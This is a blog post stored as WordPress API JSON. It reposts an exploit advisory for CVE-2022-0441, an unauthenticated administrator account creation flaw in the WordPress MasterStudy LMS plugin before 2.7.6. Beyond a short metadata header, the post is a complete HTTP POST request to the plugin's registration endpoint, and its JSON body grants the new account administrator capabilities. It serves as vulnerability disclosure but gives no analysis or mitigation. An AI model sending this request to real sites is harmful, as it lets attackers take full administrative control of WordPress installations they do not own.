{"id":20950,"date":"2022-02-22T10:38:34","date_gmt":"2022-02-22T07:38:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166060\/wpmslms275-missing.txt"},"modified":"2022-02-22T11:31:02","modified_gmt":"2022-02-22T08:01:02","slug":"wordpress-masterstudy-lms-2-7-5-account-creation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-masterstudy-lms-2-7-5-account-creation\/","title":{"rendered":"WordPress MasterStudy LMS 2.7.5 Account Creation"},"content":{"rendered":"<p dir=\"ltr\"># Title: WordPress Plugin MasterStudy LMS 2.7.5 &#8211; Unauthenticated Admin Account Creation<br \/>\n# Date: 16.02.2022<br \/>\n# Author: Numan T\u00fcrle<br \/>\n# CVE: CVE-2022-0441<br \/>\n# Software Link: https:\/\/wordpress.org\/plugins\/masterstudy-lms-learning-management-system\/<br \/>\n# Version: &lt;2.7.6<br \/>\n# https:\/\/www.youtube.com\/watch?v=SI_O6CHXMZk<br \/>\n# https:\/\/gist.github.com\/numanturle\/4762b497d3b56f1a399ea69aa02522a6<br \/>\n# https:\/\/wpscan.com\/vulnerability\/173c2efe-ee9c-4539-852f-c242b4f728ed<\/p>\n<p dir=\"ltr\">POST \/wp-admin\/admin-ajax.php?action=stm_lms_register&amp;nonce=[NONCE] HTTP\/1.1<br \/>\nConnection: close<br \/>\nAccept: application\/json, text\/javascript, *\/*; q=0.01<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4<br \/>\nContent-Type: application\/json<br \/>\nContent-Length: 339<\/p>\n<p dir=\"ltr\">{&#8220;user_login&#8221;:&#8221;USERNAME&#8221;,&#8221;user_email&#8221;:&#8221;EMAIL@TLD&#8221;,&#8221;user_password&#8221;:&#8221;PASSWORD&#8221;,&#8221;user_password_re&#8221;:&#8221;PASSWORD&#8221;,&#8221;become_instructor&#8221;:&#8221;&#8221;,&#8221;privacy_policy&#8221;:true,&#8221;degree&#8221;:&#8221;&#8221;,&#8221;expertize&#8221;:&#8221;&#8221;,&#8221;auditory&#8221;:&#8221;&#8221;,&#8221;additional&#8221;:[],&#8221;additional_instructors&#8221;:[],&#8221;profile_default_fields_for_register&#8221;:{&#8220;wp_capabilities&#8221;:{&#8220;value&#8221;:{&#8220;administrator&#8221;:1}}}}<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Title: WordPress Plugin MasterStudy LMS 2.7.5 &#8211; Unauthenticated Admin Account Creation # Date: 16.02.2022 # Author: Numan T\u00fcrle # CVE: CVE-2022-0441 # Software Link: https:\/\/wordpress.org\/plugins\/masterstudy-lms-learning-management-system\/ # Version: &lt;2.7.6 # https:\/\/www.youtube.com\/watch?v=SI_O6CHXMZk # https:\/\/gist.github.com\/numanturle\/4762b497d3b56f1a399ea69aa02522a6 # https:\/\/wpscan.com\/vulnerability\/173c2efe-ee9c-4539-852f-c242b4f728ed POST \/wp-admin\/admin-ajax.php?action=stm_lms_register&amp;nonce=[NONCE] HTTP\/1.1 Connection: close Accept: application\/json, text\/javascript, *\/*; q=0.01 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip, deflate Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 Content-Type: application\/json Content-Length: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20950","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20950","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20950"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20950\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20950"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20950"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20950"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}